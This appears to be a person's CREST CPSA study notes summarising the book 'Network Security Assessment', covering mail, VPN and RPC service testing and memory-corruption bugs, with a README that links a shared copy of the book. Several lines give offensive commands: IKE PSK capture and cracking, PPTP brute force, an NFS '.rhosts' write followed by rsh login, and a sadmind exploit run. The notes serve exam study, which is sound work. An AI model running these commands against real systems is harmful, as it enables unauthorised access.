Normal 694 | smtp 25/tcp 695 | pop2 109/tcp 696 | pop3 110/tcp 697 | imap2 143/tcp 698 | submission 587/tcp 699 | SSL-wrapped versions 700 | smtps 465/tcp 701 | imaps 993/tcp 702 | pop3s 995/tcp 703 | 704 | SMTP 705 | Fingerprinting - smtpmail 706 | Enum Enabled SMTP Subsystems and Features - Using telnet and then EHLO world 707 | Brute force - Auth is done as LOGIN(base64), PLAIN and CRAM-MD5 708 | Using HYDRA 709 | NTLM overflows through SMTP authentication - If NTLM authentication is supported, LSASS overflows (CVE-2003-0818 and CVE2003-0533) can be launched to execute arbitrary code server-side. 710 | Open Relay Testing - PAGE 319 711 | Sendmail Assessment - Info Leak (EXPN-Expand details on email, VRFY, RCPT TO) or Automatic by Brutus 712 | Sendmail process manipulation vulnerabilities - PAGE 323 713 | Microsoft SMTP Service Assessment - PAGE 324 714 | SMTP Content Checking Circumvention - PAGE 325 715 | 716 | POP-2 and POP-3 717 | POP-3 Brute force 718 | POP-3 Process Manipulation Attacks - PAGE 328 719 | 720 | IMAP 721 | Brute Force - PAGE 329 and 330 722 | 723 | Email Services Countermeasures - PAGE 330 724 | 725 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 726 | 727 | CHAPTER 12 - Assessing IP VPN Services 728 | 729 | Standard Internet Protocol (IP) packets are inherently insecure. Most IPsec implementations use the Internet Key Exchange (IKE) service to provide authentication and key exchange when establishing and maintaining an IPsec connection. After authenticating and negotiating keying material through IKE, a Security Association (SA) is established between the client and IPsec server. 730 | 731 | IPSec - IKE + Auth Header (AH) + Encapsulating Security Payload (ESP) 732 | 733 | ISAKMP and IKE 734 | Internet Security Association and Key Management Protocol - UDP 500 735 | IKE supports 3 Auth - pre-shared keys(PSK), public key encryption and digital signatures. 736 | IKE uses 2 Phases - 1st Auth the peer and establish ISAKMP SA and 2nd establish an Ipsec SA 737 | IKE Phase 1st - Main mode and aggressive mode 738 | IKE Phase 2nd - Quick mode 739 | 740 | Main Mode - One key exchange using Diffie-Hellman(DH) to generate a mutual secret key. (Protect Identity of Client and data) 741 | 6 Messages are sent - 742 | Message 1: An IKE SA (not to be confused with an IPsec SA) proposal is sent to initiate the key exchange mechanism. 743 | Message 2: The IKE SA is accepted. 744 | Messages 3 and 4: DH public values (KE) are exchanged, along with a random data nonce payload for each party (Ni and Nr). From this exchange, a mutual secret key is computed. After this point, the shared keys computed from the DH exchange are used to encrypt IKE payloads. 745 | Messages 5 and 6: Authentication data (AUTH) is sent, protected by the DH shared secret generated previously. The identification of the parties (IDii and IDir) is also protected. 746 | Note: DH computation is done after 1st Message and Peer ID are encrypted 747 | 748 | Aggressive Mode - Only 3 Messages are sent; Peer ID sent in clear text; Used in Remote VPN 749 | Messages sent are - 750 | Message 1: An IKE SA proposal is sent, along with a DH public value (KE), random nonce data (Ni), and identity information (IDii). Because the identity is passed in the first packet, before the DH exchange has completed, it cannot be encrypted. 751 | Message 2: The IKE SA is accepted, and the responder’s DH public value is sent, along with a nonce (Nr), identity information (IDir), and an authentication payload (AUTH). 752 | Message 3: Authentication information is sent back, protected by the DH secret key derived previously. 753 | 754 | Attacking IPsec VPNs 755 | IPsec Service Endpoint Enumeration - Tools such as ike-scan 756 | IPsec Service Endpoint Fingerprinting - Tools such as ike-scan 757 | Supported Transform Enumeration - Tools such as ike-scan 758 | Values for field in ike-scan ($ ike-scan -M --trans=5,2,1,2 10.0.0.254) 759 | • Encryption Algorithm: 1 (DES), 5 (3DES), 7/128 (128-bit AES) and 7/256 (256- bit AES) 760 | • Hash Algorithm: 1 (MD5) and 2 (SHA1) 761 | • Authentication Method: 1 (PSK), 3 (RSA signature), 64221 (hybrid mode) and 65001 (XAUTH) 762 | • DH Group: 1 (MODP 768), 2 (MODP 1024) and 5 (MODP 1536) 763 | Investigating Known Weaknesses - PAGE 341 764 | Denial-of-Service Vulnerabilities - Malformed IKE packet DoS (CVE-2005-1802); Negotiation slots exhaustion attack (CVE-2006-3906) 765 | Aggressive Mode IKE PSK User Enumeration - $ ike-scan --aggressive --multiline --id=royhills@hotmail.com 10.0.0.254 766 | Aggressive Mode IKE PSK Cracking - 767 | $ ike-scan --aggressive --multiline --id=royhills@hotmail.com -pskcrack=netscreen.psk 10. 0.0.254 768 | Then $ psk-crack netscreen.psk 769 | 770 | Microsoft PPTP - Microsoft’s Point-to-Point Tunnelling Protocol (PPTP) uses TCP port 1723 771 | Due to protocol complexity and reliance on MS-CHAP for authentication, PPTPv1 and PPTPv2 are vulnerable to several offline cryptographic attacks. 772 | Tools such as tch-ppt bruter ($ cat wordlist | thc-pptp-bruter 192.168.0.5) 773 | 774 | SSL VPNs - TCP 443 using only a web browser on client side 775 | Basic SSL Querying - $ openssl s_client -connect 172.16.2.2:443 776 | Enumerating Weak Cipher Support - $ openssl ciphers ALL:eNULL 777 | Ciphers used 778 | RC4-MD5, which is a strong cipher using 128-bit RC4 encryption 779 | EXP-RC4-MD5, which is a weak cipher using exportable (40-bit) 780 | RC4 NULL-MD5, which performs no encryption at all 781 | Then $ openssl s_client -cipher RC4-MD5(CIPHERS) -connect 172.16.3.18:443 782 | Known SSL Vulnerabilities - PAGE 353 783 | SSL implementation exploits - CVE-2000-0719 (Microsoft SSLPCT overflow, MS04- 011); CVE-2003-0818 (Microsoft ASN.1 heap overflow) 784 | SSL VPN web interface issues - 785 | CVE-2006-5416 F5 FirePass 1000 SSL VPN 5.5 cross-site scripting issue 786 | CVE-2006-1357 F5 FirePass 4100 SSL VPN 5.4.2 cross-site scripting issue 787 | CVE-2005-4197 Nortel SSL VPN 4.2.1.6 OS command execution vulnerability 788 | 789 | VPN Services Countermeasures - PAGE 354 790 | 791 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 792 | 793 | CHAPTER 13 - Assessing Unix RPC Services 794 | 795 | Remote Procedure Call (RPC) - 796 | TCP and UDP port 111, and sometimes on TCP and UDP port 32771 797 | 798 | Enumerating Unix RPC Services - $ rpcinfo -p 192.168.0.50 799 | status (rpc.statd); nlockmgr (rpc.lockd); nfsd; rquotad and rusersd 800 | 801 | Identifying RPC Services Without Portmapper Access - $ nmap -sR 10.0.0.9 802 | 803 | Connecting to RPC Services Without Portmapper Access - $ showmount -e 10.0.0.9 804 | 805 | RPC Service Vulnerabilities - PAGE 358 806 | Integer Overflow - CVE-2003-0028 and CVE-2002-0391, and have multiple attack vectors, including .cmsd, ttdbserverd, and dmispd. 807 | Abusing NFS and rpc.mountd (100005) - 808 | CVE-2003-0252 - xlog( ) function of the mountd service bundled with multiple Linux distributions (including Debian 8.0, Slackware 8.1, and Red Hat Linux 6.2) as part of the nfs-utils-1.0.3 package 809 | CVE1999-0832 - Red Hat Linux 5.2 and Debian 2.1 and earlier relating to the rpc.nfsd service (as part of the nfs-server-2.2beta46 package) in November 1999 810 | CVE-1999-0002 - NFS mountd service bundled with Red Hat Linux 5.1 (as part of the nfs-server-2.2beta29 package) 811 | Listing and accessing exported directories through mountd and NFS - 812 | $ showmount -e 10.0.0.6 813 | $ mount 10.0.0.6:/home /mnt 814 | $ cd jarvis 815 | $ echo + + > .rhosts 816 | $ cd / 817 | $ umount /mnt 818 | $ rsh -l jarvis 10.0.0.6 csh -i 819 | Multiple Vendor rpc.statd (100024) Vulnerabilities - 820 | CVE-2000-0666 Red Hat 6.2, Mandrake 7.1, and other Linux distributions lsx.tgz, statdx2.tar.gz, and rpc-statd.c 821 | CVE-1999-0493 Solaris 2.5.1 statd.tar.gz 822 | CVE-1999-0018 and CVE-1999-0019 Solaris 2.4, IRIX, AIX, and HP-UX dropstatd (Solaris binary) 823 | Solaris rpc.sadmind (100232) Vulnerabilities - 824 | CVE-1999-0977 - sadmind service running on Solaris 2.6 and 2.7 can be exploited by issuing a crafted RPC request, resulting in a stack overflow 825 | CVE-2003-0722 - Auth in sadmind EG $ perl rootdown.pl -h 10.0.0.9 -i 826 | Multiple Vendor rpc.cmsd (100068) Vulnerabilities- PAGE 362 827 | Multiple Vendor rpc.ttdbserverd (100083) Vulnerabilities - PAGE 363 828 | 829 | Unix RPC Services Countermeasures - PAGE 364 830 | 831 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 832 | 833 | CHAPTER 14 - Application=Level Risks 834 | 835 | Network Service Vulnerabilities and Attacks 836 | Memory Manipulation Attacks - BOF, Integer Overflow and Format String Bugs 837 | 838 | Runtime Memory Organization - Overwriting values within memory 839 | (R)The Text Segment - Contains all compiled executable code 840 | (RW)The data and BSS(Block Started by Symbol) segments - Contains all global variables for the program 841 | (RWE)The stack - Dynamic store and manipulate program functions variable(Temporary) 842 | The Heap - To store data that must exist after a function returns (and its variables) 843 | Allocator - malloc( ) 844 | Deallocator - free( ) 845 | Processor Registers and Memory - Compiled machine code for execution, global variables (Data and BSS), local variables and pointer, and other data (heap). The processor reads and interprets values in memory by using registers. A register is an internal processor value that increments and jumps to point to memory addresses used during program execution. 3 Registers - eip (the instruction pointer), ebp (the stack frame pointer), and esp (the stack pointer).The stack pointer should always point to the last address on the stack as it grows and shrinks in size, and the stack frame pointer defines the start of the current function’s stack frame. The instruction pointer is an important register that points to compiled executable code (usually in the text segment) for execution by the processor. 846 | 847 | Classic Buffer-Overflow Vulnerabilities (Stack Based) 848 | Stack Overflow - By overflowing data on the stack 849 | Stack smash (saved instruction pointer overwrite) - Crash the program, Compromising the logical program flow(using shellcode), Analyzing the program crash(Using gdb), Creating and injecting shellcode 850 | Stack off-by-one (saved frame pointer overwrite) - By same length of code 851 | Analyzing the program crash, Exploiting an off-by-one bug to modify the instruction pointer, Exploiting an off-by-one bug to modify data in the parent function’s stack frame , Off-by-one effectiveness against different processor architectures 852 | 853 | Heap Overflows (Non-Stack based; Depends upon OS heap memory) 854 | Other Heap Corruption Attacks - Heap off-by-one and off-by-five bugs , Double-free bugs 855 | 856 | Integer Overflows - a delivery mechanism for a stack, heap, or static overflow to occur (depending on where the integer ends up in memory) 857 | Heap Wrap-Around Attacks - OpenSSH 3.3 (CVE-2002-0639) 858 | Negative-Size Bugs - Provide negate input 859 | 860 | Format String Bugs - A user can control the format parameter to a function such as printf( ) or syslog( ). 861 | Reading Adjacent Items on the Stack, Reading Data from Any Address on the Stack, Overwriting Any Word in Memory 862 | 863 | Mitigating Process Manipulation Risks 864 | Here are the five main approaches: 865 | • Nonexecutable stack and heap implementation 866 | • Use of canary values in memory - A canary value is a hashed word that is known by the system and checked during execution 867 | • Running unusual server architecture 868 | • Compiling applications from source 869 | • Active system call monitoring - IDS 870 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Network Security Assessment 2 | After getting heavy demand on my Crest CPSA. I am sharing my notes on Network Security Assessment from recommended book for CPSA. Please don't keep you knowledge limited to my notes, I might have missed something important for anyone because I already knew about it. 3 | 4 | You can check the NSA.txt file, it has some missing screenshots so take reference from book and image below. 5 | 6 | ---------------- 7 | 8 | I am uploading the book PDF for Page Number References - https://drive.google.com/drive/folders/1gkG6mR3_a3AJfWZQm3kDpD2MxCLAYlQX?usp=sharing 9 | 10 | 11 | 12 | ![image](https://github.com/ahrixia/Crest_CPSA/assets/35935843/8b4fbf6f-aadc-4651-97b5-9feec1a87fcc) 13 | --------------------------------------------------------------------------------